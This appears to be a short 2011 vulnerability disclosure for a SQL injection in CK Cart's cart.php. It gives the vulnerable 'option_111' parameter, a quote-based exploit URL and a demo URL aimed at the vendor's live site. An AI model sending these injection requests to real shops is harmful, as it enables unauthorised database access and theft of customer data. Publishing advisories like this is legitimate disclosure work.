CK Cart suffers from a remote SQL injection vulnerability.
e3756f269b5d6ec276b4f3f23da5b91d1cf3cfbfec2a7ba169c459b1e6d1f4e9
# Exploit Title: CK Cart (E-Commerce System) SQL Injection
# Date: 19.08.2011
# Author: Eyup CELIK
# Software Link: http://www.ckcart.com/
# Version: All Version
# Tested on: All versions are Vulnerability
ISSUE
SQL Injection can be done using the command input
Vulnerable Page:
cart.php
Example:
cart.php?action=add&item_id=173&manufacturer_id=34&option_111=%24<SQL
Injection Code>&quantity=1&submit=Order
Exploit:
cart.php?action=add&item_id=173&manufacturer_id=34&option_111=%24'1&quantity=1&submit=Order
Demo:
http://www.ckcart.com/cart.php?action=add&item_id=173&manufacturer_id=34&option_111=%24<SQL Injection
Code>&quantity=1&submit=Order
Thanks,
Eyup CELIK
Bilgi Teknolojileri Güvenlik Uzmani
http://www.eyupcelik.com.tr